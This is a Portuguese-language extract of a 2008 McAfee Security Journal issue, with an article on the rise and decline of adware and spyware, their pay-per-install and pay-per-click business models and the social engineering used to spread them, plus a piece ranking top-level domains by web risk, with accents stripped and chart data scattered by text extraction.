Adware Um tipo de software de exibio de anncios que fornece um contedo de propaganda de uma maneira ou contexto potencialmente inesperado e indesejado pelos usurios. O documento sobre modelo de risco da ASC detalha muitos dos comportamentos que podem ser considerados inesperados ou indesejados. Muitos aplicativos de adware tambm realizam funes de rastreamento e, portanto, tambm podem ser categorizados como tecnologias de rastreamento. Alguns consumidores podem querer remover o adware, caso sejam contrrios a tal rastreamento, podem no desejar ver o anncio causado pelo programa ou podem no gostar de seus efeitos sobre o desempenho do sistema. Por outro lado, alguns usurios podem querer manter determinados programas de adware caso sua presena amortize o custo de um produto ou servio desejado ou caso eles forneam uma propaganda que seja til ou desejada, como anncios que sejam competitivos ou complementares quilo que o usurio est procurando. Spyware No sentido mais estrito, spyware um termo para software de rastreamento distribudo sem noticao, consentimento ou controle adequado por parte do usurio. Em uma acepo mais ampla, usa-se spyware como um sinnimo para o que a ASC chama de Spyware (e outras tecnologias potencialmente indesejadas): tecnologias distribudas sem o devido consentimento do usurio e/ou implementadas de maneiras que prejudiquem o controle do usurio sobre:
Em busca de clareza
Os termos adware e spyware costumam ser utilizados de forma imprecisa e trocados um pelo outro, criando confuso. Vamos seguir as denies fornecidas pela Anti-Spyware Coalition (ASC).1
mudanas concretas que afetem sua experincia de usurio, privacidade ou segurana do sistema; uso dos recursos de seus sistemas, incluindo quais programas esto instalados em seus computadores; coleta, utilizao e distribuio de suas informaes pessoais ou outras informaes condenciais.
38
Reconhecendo que o termo comum spyware desviou-se bastante de seu signicado exato, os membros da ASC decidiram utilizar spyware (em seu signicado estrito) em documentos tcnicos. Reconhecendo ainda que impossvel evitar conotaes mais amplas surgidas com o uso popular, a ASC tambm observa a existncia de uma interpretao geral que inclui todos os PUPs. Neste artigo, o termo spyware nunca utilizado em seu sentido mais amplo, mas sempre no sentido estrito, a saber, como software relacionado a marketing. Ns utilizamos o termo software de monitoramento para denir programas puramente espies, como keyloggers (que registram pressionamentos de teclas).
Com o aumento do trfego e dos pagamentos, Joo pode decidir usar um exploit para instalar o aplicativo de adware sem que os usurios estejam cientes da instalao. Muitos desses aplicativos exibem um contrato de licena de usurio nal (EULA - end-user license agreement) antes da instalao, mas isso iria apenas alarmar os visitantes, ento, Joo resolve modicar o aplicativo para suprimir o EULA e aumentar seu ndice de instalaes. Agora, se Joo for um hacker experiente, ele poder replicar esse modelo em milhares de sites comprometidos para aumentar exponencialmente suas instalaes e pagamentos. Nosso colega Benjamin Edelman, autor colaborador do McAfee Security Journal, descreve um cenrio real semelhante em seu site.5
Uma decolagem rpida

O adware e o spyware chamaram nossa ateno no ano de 2000, com o aparecimento do Adware-Aureate, que empregava o histrico de navegao do usurio para exibir anncios. Essa jogada levou criao de um dos primeiros aplicativos antispyware, o OptOut, da Gibson Research Corp.2 O adware e o spyware comearam a crescer de forma notvel por volta do nal de 2004, atingindo um pico em 2005. (Veja as guras 1 e 2.) A principal motivao era gerar renda atravs de milhes de instalaes em desktops de usurios (em um modelo de pagamento por instalao), bem como exibir anncios (em um modelo de pagamento por clique). A indstria do adware e do spyware vicejou nesses anos devido grande quantidade de renda gerada a partir dos anncios. Toda vez que um usurio clicava em um determinado anncio, o fornecedor do anncio recebia uma comisso.
Adware 5.000
4.000 3.000 2.000 1.000 0 2000 2001 2002 2003 2004 2005 2006 2007 2008 (previso)
Figura 1: O crescimento do adware atingiu um pico em 2005. (Fonte: McAfee Avert Labs).
Spyware e software de monitoramento 300

250 200 150 100 50 0 2000 2001 2002 2003 2004 2005 2006 2007 2008 (previso)
Modelos de compensao e empecilhos

O adware e o spyware utilizam dois principais modelos de compensao para anncios on-line. Ambos funcionam bem em um mundo ideal, mas como eles se saem em um mundo que inclui pessoas mal-intencionadas? Vamos dar uma olhada em como esses modelos podem ser explorados.
Pagamento por instalao: O modelo do lado do cliente.
No modelo de pagamento por instalao (PPI), as empresas que vendem produtos ou servios pagam ao provedor de adware para exibir anncios. O provedor de adware, por sua vez, paga a indivduos ou associados para distribuir seu adware utilizando agregao ou outros meios. (ZangoCash, por exemplo, paga de US$0,75 a US$1,45 nos Estados Unidos para cada elemento de adware instalado.4) Finalmente, o software precisa ser instalado na mquina cliente. O modelo PPI normalmente rastreia instalaes de software utilizando um determinado indicador. Portanto, se Joo hospedar um instalador de adware do tipo PPI em seu site e algum outro usurio zer download e instalar esse software atravs do site, Joo receber uma determinada quantia em dinheiro. Para aumentar os downloads de seu site, Joo pode tentar aumentar o trfego utilizando contedo que chame a ateno, como ttulos apelativos, imagens ou vdeos adultos, jogos gratuitos ou ringtones.
Spyware Programas de monitoramento
Figura 2: O spyware e os programas de monitoramento tambm tiveram um declnio generalizado desde 2005, mas estamos antecipando uma reverso dessa tendncia para o nal de 2008. (Fonte: McAfee Avert Labs).
39
O modelo PPI de compensao provou ser muito lucrativo para programadores, bem como para pessoas mal-intencionadas contribuindo, assim, para o fantstico crescimento do adware e do spyware. Muitos vetores de instalao suportam esse modelo. Esses vetores podem ser divididos, basicamente, em duas categorias:
Para melhor mitigar os vetores de ataque que exploram esses modelos de compensao, vamos dar uma olhada rpida no papel desempenhado pela engenharia social nesse mercado online de innitas possibilidades de gerao de renda.
Engenharia social Isso requer interao com o usurio e depende do usurio instalar e, em alguns casos, at mesmo propagar o software. O nmero de mtodos de engenharia social limitado apenas pela imaginao dos atacantes, que podem iludir at mesmo o mais precavido dos usurios. No exemplo do Joo, oferecer ringtones ou jogos grtis uma isca que muitas pessoas acham irresistvel. Eventualmente, o usurio decide correr o risco para no perder os brindes grtis. Exploits A instalao de adware atravs de exploits pode no exigir interao humana alguma, mas, em muitos casos, o usurio atrado, atravs de tcnicas de engenharia social, para sites maliciosos que hospedam esses exploits.
Aspectos da engenharia social

Os hackers vo atrs do elo mais fraco na corrente da segurana, que sempre o ser humano. Kevin Mitnick (2007)11 Independente do modelo que os desenvolvedores de adware utilizem, o principal fator de seu xito so os usurios. Em nosso exemplo anterior, as pessoas foram infectadas porque visitaram o site malicioso movidas pelas tticas de engenharia social do Joo. Uma razo pela qual a engenharia social costuma ser bemsucedida que muitas pessoas acreditam no que vem e no so, por natureza, desconadas de determinadas atividades on-line. Os engenheiros sociais maliciosos sabem como explorar a natureza humana. Um estudo de caso realizado pelo Ministrio do Interior dos EUA revela que 84% dos departamentos governamentais atribuem vrias violaes de segurana a erro humano; 80% dos departamentos atribuem esses erros falta de treinamento em segurana, conhecimento de segurana ou inobservncia de procedimentos.12 Centenas de milhares de programas de malware utilizam engenharia social para serem instalados nas mquinas dos usurios: esse um dos vetores mais comuns do fornecimento de malware. Matthew Braveman classica os vrios vetores de instalao em quatro categorias principais.13 De acordo com esse estudo, praticamente um tero do malware foi instalado aproveitando-se mtodos de engenharia social. O adware e o spyware adotaram muitas metodologias populares de engenharia social e adotaram novas tcnicas para distribuir seu software. A engenharia social o vetor de instalao favorito do modelo PPI, que oferece opes mais amplas para o fornecimento de adware e spyware. Esses aplicativos podem ser fornecidos atravs de mecanismos aparentemente incuos, como freeware agregado ou por mecanismos suspeitos, como spam ou anexos de email com texto enganoso. Um usurio que queira freeware, por exemplo, pode instalar conscientemente um adware para utilizar os servios gratuitos. Mesmo que uma instalao ocorra atravs de um exploit ou spam direto, as empresas de segurana podem, mesmo assim, no determinar que o software malicioso porque o fornecedor alega que no toma parte na distribuio e que outras pessoas esto explorando seu software.
Pagamento por clique: O modelo do lado do servidor.6

O modelo de pagamento por clique (PPC) tem duas variantes: anncios patrocinados e anncios com base no contedo. O modelo PPC no requer que software de adware ou spyware algum esteja instalado no sistema do usurio, mas o modelo pode depender da entrada de informaes pelo usurio para denir algum contexto por exemplo, a partir de resultados de mecanismos de busca para fornecer anncios relevantes. Os anncios com base em contedo do Google, por exemplo, funcionam utilizando o modelo PPC. Alguns dos mecanismos de entrega mais comuns para contedo PPC so:
Anncios do tipo banner Os anncios so mostrados dentro de uma faixa ou espao predenido. Esse contedo pode mudar. Anncios pop-up ou pop-under Os anncios so fornecidos em janelas separadas, incomodando o usurio. Anncios com base em Flash Estes so semelhantes aos anncios do tipo banner, mas utilizam animao em Flash para variar o contedo.
O modelo PPC pode funcionar em um ambiente muito mais controlado, no qual o site que hospeda esses anncios pode escolher o mecanismo de fornecimento. Embora o modelo PPC se baseie no servidor e parea mais seguro, ele no toda prova. Os golpistas ainda podem utilizar seus truques para enganar os usurios.7 Como a maior parte do contedo dos anncios armazenada em servidores e utiliza JavaScript, Flash e outras tecnologias de contedo rico, a insero de anncios maliciosos no uxo de anncios no difcil.8, 9 Em um desses casos, uma rede de anncios de propriedade do Yahoo distribuiu, sem saber, anncios do tipo banner maliciosos que eventualmente zeram download de cavalos de Tria nas mquinas dos usurios. Nesse cenrio especco, os anncios do tipo banner foram mostrados em sites como MySpace e PhotoBucket. Os anncios maliciosos inltraramse na rede de anncios do Yahoo sem serem detectados. Tambm vimos cliques dos usurios seqestrados por envenenamento de cache DNS.10 No entanto, os usurios no so diretamente afetados nesses casos. O servidor ou o provedor de servios de Internet que hospeda os anncios est mais vulnervel a essas ameaas.
Como a maior parte do contedo dos anncios armazenada em servidores e utiliza JavaScript, Flash e outras tecnologias de contedo rico, a insero de anncios maliciosos no uxo de anncios no difcil.
40
Site de rede social nvel de confiana alto Mecanismo de pesquisa nvel de confiana baixo Usurio Link recebido via mensagem instantnea, email, spam nvel de confiana mnimo Link recebido via perfil de um amigo em um site de rede social, Google, notebook, domnio confivel, etc. nvel de confiana alto Site de engenharia social (por exemplo, que oferecem links de MP3 gratuitos, vdeos para adultos, etc.)
Figura 3: Vrios vetores expem os usurios a programas maliciosos e indesejados.
uma questo de conana

A gura 3 mostra quatro cenrios de exposio do usurio a um site de engenharia social. Embora a ilustrao seja simples, ela pode nos ajudar a compreender os seguintes casos reais. A chave que, quanto maior o nvel de conana, mais provvel que uma determinada tcnica de engenharia social tenha xito. Explicaremos com mais detalhes utilizando trs breves estudos de casos.
Caso 2: Anncios em banners

Os anncios em banners esto no domnio do modelo PPC. O nvel de conana nesses cenrios da vida real era muito alto, pois os usurios estavam visitando sites conveis e que visitavam freqentemente.
Caso 1: Sites de rede social

Os sites de rede social so uma ddiva para os engenheiros sociais porque a maioria das pessoas nesses sites est procurando fazer ou manter contato com amigos. Os engenheiros sociais podem criar relacionamentos para aumentar o fator de conana, como mostrado no topo da gura 3. O nvel de conana costuma ser muito alto nessa categoria. Vrios ataques de engenharia social dignos de nota exploraram essa conana para instalar adware nas mquinas dos usurios:

Em 2006, The Washington Post informou que um anncio de banner malicioso no MySpace servia adware, bem como cavalos de Tria, para milhes de usurios usando exploits de meta-arquivo do Microsoft Windows, sem qualquer interveno do usurio.17 Em 2008, vimos um aumento nos anncios de banner maliciosos. O mais recente no momento em que escrevamos este artigo foi um anncio do tipo Flash no usatoday.com.18 Apenas visitando a pgina, os usurios eram atacados por vrios malware, bem como alertas falsos (uma ttica popular de engenharia social) para fazer download de um aplicativo antispyware nocivo chamado Malware Alert. (Programas nocivos podem incluir PUPs, bem como cavalos de Tria.)
Visualizador MySpace Adult Content (nvel de conana: mdio). Esse incidente se baseou no fato de um usurio ter clicado em um anncio pop-up com pessoas jovens e um ttulo como Quero ser amado(a).14 Clicar nesses anncios resultou no download do software MySpace Adult Content, que sabidamente faz download de adware. Vdeo fraudulento do YouTube no MySpace (nvel de conana: alto). O WebSense informou no nal de 2006 que um vdeo fraudulento do YouTube foi postado em vrios pers falsos no MySpace.15 Ao tentar visualizar o vdeo, era exigida a instalao do Zango Cash. Aplicativo Facebook Secret Crush (nvel de conana: muito alto). Em janeiro de 2008, a Fortinet gerou uma recomendao sobre um widget malicioso chamado Secret Crush que estava tentando instalar adware.16 Essa ttica de engenharia social funcionou primeiro enviando uma solicitao do Facebook com o ttulo 1secret crush invitation. Ao abrir essa solicitao, o usurio tinha de instalar um widget para saber quem enviou a mensagem. A solicitao pedia ainda ao usurio que a encaminhasse para cinco amigos antes que fosse mostrado quem enviou a mensagem. Usurios ingnuos encaminhavam essa mensagem para amigos, tornando isso um worm social. Aps seguir essas etapas, tudo o que os usurios viram foi uma mensagem para download do Adware Zango. As vtimas foram facilmente iludidas por esse cenrio porque o nvel de conana era muito alto.
Caso 3: Outras tticas intrigantes
Email falsicado (nvel de conana: baixo). Em um caso, emails falsicados do eBay foram enviados como spam, com links apontando para download de adware.19 O aspecto de engenharia social ocorreu no contedo do email, que avisava aos usurios incautos que havia um problema em suas informaes de cobrana e que eles precisavam atualizar os dados fazendo download de um determinado software. Pginas de erro falsas (nvel de conana: mdio). Determinados sites exibiam mensagens de erro pgina no encontrada falsas e se ofereciam para resolver a situao atravs do download de um componente ActiveX que instalava o WinFixer.20 Spam de notebook do Google (nvel de conana: alto). Em um acontecimento recente, golpistas utilizaram mais uma tcnica de engenharia social fazendo spam com links para pginas de notebook do Google.21 O hiperlink tem o formato www.google. com/notebook/public/[ID do usurio]/[bloqueado]. O domnio google.com deixa as pessoas menos desconadas e as encoraja a clicar nas pginas maliciosas, que hospedam vrios links para sites adultos ou vdeos falsos. Esses links, eventualmente, resultam no download de vrios aplicativos antispyware nocivos.
41
Uma retirada silenciosa

A inicial falta de leis para regulamentar aplicativos de adware e spyware deu bastante liberdade a seus desenvolvedores, quer suas motivaes tenham sido meramente nanceiras ou realmente maliciosas. A princpio, os usurios pareciam protegidos porque tinham contratos de licena de usurio nal (EULAs) para avis-los de quaisquer efeitos indesejados desses aplicativos. No entanto, os EULAs eram freqentemente confusos, incompletos ou ocultos. Uma vez encontrados, eram difceis de ler freqentemente contidos em janelas pequenas que exibiam apenas algumas palavras de cada vez. Com uma cortina de fumaa to ecaz, por que o adware e o spyware declinaram? Vrios fatores contriburam para isso.
Aplicativos nocivos
Como os autores de malware ganham dinheiro fcil utilizando a ttica do medo, h uma tendncia crescente de distribuio de aplicativos nocivos e falsos alertas de cavalos de Tria, que exibem mensagens falsas de erro e infeco. Na maioria dos casos, os cavalos de Tria de alertas falsos so os downloaders dos aplicativos nocivos que detectam arquivos e chaves do Registro falsas como malware. s vezes, esses aplicativos nocivos instalam os arquivos apenas para detect-los posteriormente. Nesses casos, o aplicativo nocivo merece ser classicado como um Trojan (tais cavalos de Tria esto includos na gura 4). Tambm observamos muitos casos de adware instalado por cavalos de Tria. A categoria de cavalo de Tria DownloaderUA uma dessas famlias que utiliza tticas de engenharia social para fazer download de programas falsos. Descoberta no nal de 2004, essa famlia emprega brechas na maneira como o Microsoft Windows Media Player utiliza tecnologia de gerenciamento de direitos digitais induzindo os usurios a fazer download de arquivos de mdia criados especialmente.31, 32 Em 2008, a mesma famlia de cavalos de Tria esteve novamente envolvida em induzir usurios a fazer download de um tocador de MP3 falso para tocar uma seleo de msicas. Ela tambm fez download de vrios programas de adware em seus sistemas.33 O crescimento de aplicativos nocivos (PUPs e cavalos de Tria) foi exponencial em 2008, em comparao com os anos anteriores. (Veja a gura 4.) Para avaliar a freqncia dos produtos antispyware nocivos distribudos por cavalos de Tria do tipo downloader, analisamos um conjunto de endereos IP envolvidos na iniciao desses downloads. Uma consulta executada no domnio hosts-les.net retornou 158domnios associados ao mesmo endereo IP.34 (Veja a gura 5.)
Aes judiciais Devido ao aumento em abusos por aplicativos de adware e spyware, consumidores e outros reclamantes moveram vrias aes judiciais contra alguns grandes distribuidores.22, 23, 24, 25, 26, 27 As decises de vrios tribunais ajudaram a limitar a quantidade de adware e spyware. Na sentena contra a Zango,12 por exemplo, o tribunal determina que a Zango monitore seus distribuidores terceirizados para assegurar que seus aliados e subaliados cumpram com a determinao da FTC. A deciso tambm probe a Zango de, diretamente ou atravs de outrem, explorar vulnerabilidades de segurana para download de software, que d cincia de seus procedimentos, de maneira clara e proeminente, e que obtenha dos consumidores autorizao expressa antes de fazer download de software nos computadores destes. Tais determinaes ajudaram a enfraquecer o mtodo PPI e levaram os distribuidores de anncios a melhorar sua atitude. Conscientizao pblica e grupos da indstria A Federal Trade Commission tem um site informativo28 que oferece dicas sobre como se proteger contra spyware e como denunciar abusos. A Anti-Spyware Coalition tambm oferece muitas informaes e detalhes sobre essa ameaa.29 Devido ao empenho dessas organizaes, tanto consumidores quanto legisladores tm uma compreenso muito melhor das questes e regras relacionadas propaganda on-line. Essa maior conscientizao ajudar a reduzir a ocorrncia desses aplicativos indesejados. M publicidade e possveis aes judiciais contra anunciantes associados a empresas de adware O dinheiro que inicialmente motivou o mercado de adware e spyware veio de anunciantes que utilizavam empresas de adware para exibir os anncios. A princpio, essas empresas de produtos e servios no investigaram como as rmas de adware distribuam seus anncios. Em uma sentena histrica publicada em 29 de janeiro de 2007,30 determinou-se que antes da contratao de uma empresa para fornecer seus anncios, e trimestralmente a partir de ento, as empresas precisam investigar como seus anncios on-line so fornecidos. As empresas precisam interromper imediatamente a utilizao de programas de adware que violem as determinaes ou suas prprias polticas de adware. Como os anunciantes agora compreendem os riscos (invaso de privacidade, consentimento inadequado e outros) associados ao modelo PPI, eles esto adotando o modelo PPC, que no requer aplicativos nos sistemas dos usurios.
Aplicativos nocivos
1.000 500 0
2005
2006
2007
2008 (previso)
PUP Cavalo de Tria
Figura 4: Ao contrrio do adware e do spyware, os aplicativos nocivos (PUPs e cavalos de Tria) aumentaram consideravelmente em 2008. (Fonte: McAfee Avert Labs).
42
Concluso
A mera observao de uma anlise das estatsticas sugere que o crescimento do adware e do spyware est em queda. No entanto, as intrigantes tticas de engenharia social utilizadas para distribuir esses PUPs ainda esto presentes, fornecendo aplicativos nocivos e cavalos de Tria. Com o aumento do modelo do lado do servidor (PPC) para distribuio de anncios, certamente veremos melhores tticas de engenharia social induzindo os usurios a clicar nesses anncios e a gerar renda para os aliados. A distribuio de adware e cavalos de Tria continuar a ganhar terreno em sites de rede social. Embora o nmero total de programas de adware e spyware tenha cado, no vemos soluo fcil, no futuro prximo, para o problema dos programas indesejados. Como as empresas de adware pagam por tais instalaes, sua obrigao moral deve ser manter controle sobre cada instalao e interromper rapidamente qualquer possvel distribuio indevida de seu software. Mas elas faro isso realmente? Com o cenrio mutvel de ameaas e o aumento nos cavalos de Tria motivados por renda, temos de permanecer vigilantes e treinar funcionrios e usurios domsticos para compreender melhor a ameaa da engenharia social.
Figura 5: Vrios nomes de hosts so mapeados para um nico endereo IP que distribui aplicativos nocivos localizados.
Cada um dos domnios mostrados na gura 5 exibe um antispyware nocivo ou um produto limpador de sistema nocivo personalizado. As pginas tambm aparecem em vrios idiomas. Analisando 620 pginas, encontramos 24 idiomas utilizados para criar tanto pginas quanto aplicativos, o que demonstra que as ameaas se espalharam muito alm dos pases falantes da lngua inglesa. Mais de uma vez, um nico IP associado a vrios domnios. Em alguns casos, vimos at 200 domnios diferentes. Uma consulta com a palavra-chave FSA (que hosts-les.net descreve como uma classe de domnios que hospedam aplicativos nocivos) retornou perto de 3.600 domnios distribuindo aplicativos nocivos.35
Aditya Kapoor pesquisador snior no McAfee Avert Labs. Ele foi apresentado engenharia reversa seis anos atrs ao pesquisar na Universidade de Louisiana, em Lafayette, para sua tese de mestrado, que se concentrou em um algoritmo sliding disassembly para lidar com ofuscao de cdigo. Na McAfee, Kapoor desenvolveu-se em anlise de rootkits, comparao de cdigos de bytes e anlise comportamental. Ele gosta de viajar e de estudar culturas e arquiteturas diferentes.
Notas de rodap 1 http://www.antispywarecoalition.org/documents/2007glossary.htm

2 OptOut, Gibson Research Corp. http://www.grc.com/optout.htm 3 http://en.wikipedia.org/wiki/Compensation_methods 4 Fonte: Site da Zango. http://www.cdt.org/headlines/headlines.php?iid=51 5 http://www.benedelman.org/news/062907-1.html 6 http://en.wikipedia.org/wiki/Compensation_methods#Pay-per-click_.28PPC.29 7 http://www.benedelman.org/ppc-scams/ 8 http://msmvps.com/blogs/spywaresucks/archive/2007/08/22/1128996.aspx 9 http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ 10 http://www.secureworks.com/research/threats/ppc-hijack/ 11 http://www.csc.com/cscworld/012007/dep/fh001.shtml 12 http://www.usgs.gov/conferences/presentations/5SocialEngineeringInternalExter nalThreat%20Dudeck.ppt 13 http://download.microsoft.com/download/c/e/c/cecd00b7-fe5e-4328-8400 2550c479f95d/Social_Engineering_Modeling.pdf 14 http://mashable.com/2006/10/11/myspace-adult-content-viewer-more-adware/ 15 http://securitylabs.websense.com/content/Alerts/1300.aspx 16 http://www.fortiguardcenter.com/advisory/FGA-2007-16.html 17 http://blog.washingtonpost.com/securityx/2006/07/myspace_ad_served_ adware_to_mo.html
18 http://securitylabs.websense.com/content/Alerts/3061.aspx 19 http://securitylabs.websense.com/content/Alerts/738.aspx 20 http://www.avertlabs.com/research/blog/index.php/2006/12/04/404-not-just-lenot-found/ 21 http://www.cantoni.org/2008/06/04/google-notebook-spam 22 http://www.benedelman.org/spyware/nyag-dr/ 23 http://www.oag.state.ny.us/media_center/2005/apr/apr28a_05.html 24 http://www.internetlibrary.com/cases/lib_case358.cfm 25 http://blogs.zdnet.com/Spyware/?p=655 26 http://www.ftc.gov/opa/2006/11/zango.shtm 27 http://www.ftc.gov/bcp/edu/microsites/spyware/law_enfor.htm 28 http://onguardonline.gov/spyware.html 29 http://www.antispywarecoalition.org/ 30 http://www.oag.state.ny.us/media_center/2007/jan/jan29b_07.html 31 http://www.pcworld.com/article/119016/risk_your_pcs_health_for_a_song.html 32 http://vil.nai.com/vil/content/v_130856.htm 33 http://www.avertlabs.com/research/blog/index.php/2008/05/06/fake-mp3srunning-rampant/ 34 http://hosts-le.net/?s=67.55.81.200&sDM=1#matches 35 http://hosts-le.net/?s=Browse&f=FSA
43
Quo arriscados so os domnios de nvel mais alto?

Por David Marcus
Os dados do McAfee SiteAdvisor mostram como o risco varia ao redor do mundo.

Em seu excelente documento Mapping the Mal Web, Revisited, (Mapeamento de sites perigosos na Web; revisitado), publicado no exemplar de junho de 2008 de McAfee Security Insights,1 nosso colega Shane Keats examinou a fundo a distribuio de sites maliciosos pela Internet utilizando dados da tecnologia McAfee SiteAdvisor. Nos dias de hoje, as pessoas precisam saber onde seguro surfar e pesquisar. Mas se a Internet realmente uma grande vizinhana digital, reexo de qualquer grande cidade do mundo, em quais ruas seguro andar? Quais domnios so mais arriscados que outros? Qual domnio de nvel mais alto (TLD) apresentou os maiores aprimoramentos em segurana? Qual apresentou os piores? Quais palavras de pesquisa so mais arriscadas que outras? Os usurios da Internet perguntam-se cada vez mais essas questes. O McAfee Security Journal dedicado a ajud-lo a encontrar essas respostas fornecendo dados e anlises que o auxiliem a tomar as melhores decises possveis. Nesta edio, resumimos dados recentes sobre ameaas relacionados a domnios de nvel mais alto: tanto TLDs genricos .com, .info, .biz e assim por diante quanto TLDs de pases .cn, .ru, .br e outros. Observamos cuidadosamente no apenas os nveis de risco atuais desses domnios nas Amricas, Europa e sia, mas tambm a maneira como eles mudaram ao longo do ano passado. Classicamos cada TLD por risco total e, em seguida, realizamos anlises adicionais de prticas de email, segurana de downloads e predomnio de exploits com base na Web e categorizamos os vinte principais domnios de nvel mais alto para cada tipo de risco. Os resultados foram impressionantes. O risco no est distribudo por igual pela Internet, como esses dados claramente sugerem. Os domnios genricos e de pases mostraram tipos e graus variveis de risco e de perigos. Alguns pases se beneciaram de bons hbitos de email, mas apresentaram prticas ruins de download. Outros sofreram com hospedagem de exploits ou cdigos maliciosos. Esperamos que esses resultados o ajudem a navegar. Lembre-se de olhar para os dois lados ao atravessar as avenidas da Internet! Leitura dos grcos No grco intitulado TLDs da Europa, Oriente Mdio e frica classicados por risco total, voc ver, na barra mais esquerda, que a Romnia domnio .ro chegou a quase sete por cento. Isso signica que, de acordo com o software SiteAdvisor, a McAfee descobriu que quase sete por cento de todos os sites dentro desse domnio de nvel mais alto sofreram de uma ou mais das ameaas que medimos: exploits de navegador, adware/spyware/cavalos de Tria/vrus, grande volume de email comercial, aliaes com outros sites arriscados, marketing de pop-up agressivo ou avaliaes e comentrios da comunidade SiteAdvisor. Quanto maior o valor, maior o risco para os usurios. Alm de um valor total, indicamos a variao do risco em relao ao ano anterior. O grco de linhas mostra que, na Romnia, o risco aumentou em aproximadamente um por cento, enquanto na Eslovquia, por exemplo, o risco caiu em aproximadamente trs por cento. Nmeros positivos indicam aumento do risco em comparao com o ano anterior; porcentagens negativas indicam a queda do risco.
David Marcus diretor de comunicaes e pesquisa de segurana no McAfee Avert Labs. Ele disponibiliza a ampla pesquisa de segurana do Avert Labs para os clientes da McAfee e para a grande comunidade de segurana. As responsabilidades atuais de Marcus incluem liderana em idias, mdia e relaes pblicas, atuando como blogmaster do Blog de segurana do McAfee Avert Labs, alm de ser co-apresentador do AudioParasitics PodCast ocial do McAfee Avert Labs. Ele tambm gerencia todas as publicaes do Avert Labs, incluindo o McAfee Security Journal.
NOTA DE RODAP
1 http://www.mcafee.com/us/security_insights/archived/june_2008/si_jun1_08.html
44
-0,5% 1,0% 1,5% 2,0% 2,5%
0,0%
0,5%
-10,0%
-1,5%
-1,0%
-4,0% 0,0% 2,0% 4,0% 6,0% 8,0%
-2,0%
0,0%
10,0%
12,0%
14,0%
16,0%
18,0%
20,0%
-8,0% 2,0% 4,0% 6,0% 8,0%
-6,0%
-4,0%
-2,0%
Estados Unidos .us
Hong Kong .hk Rssia .ru Ucrnia .ua Unio Europia Ir .ir Espanha .es Bulgria .bg Itlia .rit Frana .fr Letnia .lv Polnia .pl Hungria .hu Repblica Tcheca .cz Sua .ch Blgica .be Turquia .tr Eslovquia .sk Israel .il Alemanha .de Repblica da China (Taiwan) .tw Tokelau .tk Niue .nu Tailndia .th Vanuatu .vu Indonsia .id Malsia .my Nova Zelndia .nz Cingapura .sg Austrlia .au Japo .cjp Litunia .lt Estnia .ee ustria .at Portugal .pt Holanda .nl Crocia .hr frica do Sul .za Reino Unido .uk Iugoslvia .yu Grcia .gr Sucia .se Irlanda .ie Dinamarca .dk Islndia .is Eslovnia .si Noruega .no Finlndia .fi Repblica Popular da China .cn Filipinas .ph Ilhas Cocos (Keeling) .cc Samoa .ws ndia .in Coria do Sul .kr Tuvalu .tv Tonga .to Vietn .vn
Romnia .ro
Argentina .ar
Brasil .br
Mxico .mx
Chile .cl
TLDs da sia classificados por risco geral
Canad .ca
TLDs das Amricas classificados por risco geral
Venezuela .ve
Colmbia .co
TLDs da Europa, Oriente Mdio e frica classificados por risco geral
Risco geral de 2008
Variao no risco de 2007 a 2008 em pontos
Ilha Christmas .cx
Adware/spyware/ cavalos de Tria/vrus
Afiliaes com outros sites de risco Exploits de navegador
Critrios de risco utilizados para avaliar os TLDs
Anlises/comentrios da comunidade SiteAdvisor
Email comercial de grande volume
Risco geral de 2008
Risco geral de 2008
Marketing de pop-up agressivo
45
10,0%
15,0%
20,0%
25,0%
-0,4%
-0,2%
-5,0%
-20,0%
-10,0%
0,0%
0,2%
0,4%
0,6%
0,8%
1,0%
1,2%
0,0%
5,0%
10,0%
20,0%
30,0%
40,0%
50,0%
60,0%
70,0%
0,0%
20 principais TLDs classificados por exploits
Principais TLDs classificados por prticas de email
20 principais TLDs classificados por risco de download
46
Informao .info Repblica Popular da China .cn Hong Kong .hk Network .net Rssia .ru Coria do Sul .kr Business .biz Repblica da China (Taiwan) .tw Comercial .com Samoa .ws Iugoslvia .yu Ucrnia .ua Tailndia .th Ilhas Cocos (Keeling) .cc Eslovquia .sk Crocia .hr Unio Europia .eu Bulgria .bg ndia .in Letnia .lv Repblica Popular da China .cn Itlia .it Famlias/indivduos .name Bulgria .bg Blgica .be Ilhas Cocos (Keeling) .cc Tonga .to Tuvalu .tv Network .net Comercial .com Estados Unidos .us Tokelau .tk Ilha Christmas .cx Letnia .lv Israel .il Vietn .vn Business .biz Samoa .ws Romnia .ro Informao .info
Risco geral de 2008 Variao no risco de 2007 a 2008 em pontos Risco geral de 2008 Risco geral de 2008 Variao no risco de 2007 a 2008 em pontos Variao no risco de 2007 a 2008 em pontos
Romnia .ro
Informao .info
Niue .nu
Repblica Popular da China .cn
Rssia .ru
Business .biz
Famlias/indivduos .name
Ilhas Cocos (Keeling) .cc
Crocia .hr
Tonga .to
Ucrnia .ua
Vietn .vn
ndia .in
Network .net
Portugal .pt
Samoa .ws
Polnia .pl
Estados Unidos .us
Comercial .com
Hong Kong .hk
47
McAfee do Brasil Av. Naes Unidas, 8.501 - 16 andar CEP 05425-070 - So Paulo - SP Brasil Tel. + 55 11 3711-8200 www.mcafee.com.br
McAfee e/ou marcas adicionais mencionadas neste documento so marcas comerciais ou registradas da McAfee, Inc. e/ou de empresas aliadas nos Estados Unidos e/ou em outros pases. A cor vermelha da McAfee usada em relao segurana trao distintivo dos produtos que levam a marca McAfee. Todas as marcas registradas e no registradas aqui contidas so de nica propriedade de seus respectivos donos. 2008 McAfee, Inc. Todos os direitos reservados. 5001_sec-jrnl_fall08
48

MSJ BR

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

MSJ BR

Enviado por

Direitos autorais:

Formatos disponíveis

Viso de segurana do McAfee Avert Labs Outubro-Dezembro 2008

ENGENHARIA SOcIAL A principal ameaa de segurana do mundo

McAfee Security Journal Outubro-Dezembro 2008

Estria do McAfee Security Journal

As origens da engenharia social

Prometeu: O deus da engenharia social?

O ataque de phishing de Jac e Rebeca

McAFEE SECURITY JOURNAL

Sanso e Dalila: Espionagem contratada

O primeiro cavalo de Tria

O cavalo de Tria de hoje

Vrus e bots Cavalos de Tria PUPs

Uma trapaa atualizada

McAFEE SECURITY JOURNAL

Relatrios de phishing Em milhares

Relatrios de phishing distintos Novos sites de phishing

Histria da segurana de computadores

1978 1980 1982 1983 1984 1986 1988

O filme War Games (Jogos de guerra) dramatiza as conseqncias do hacking

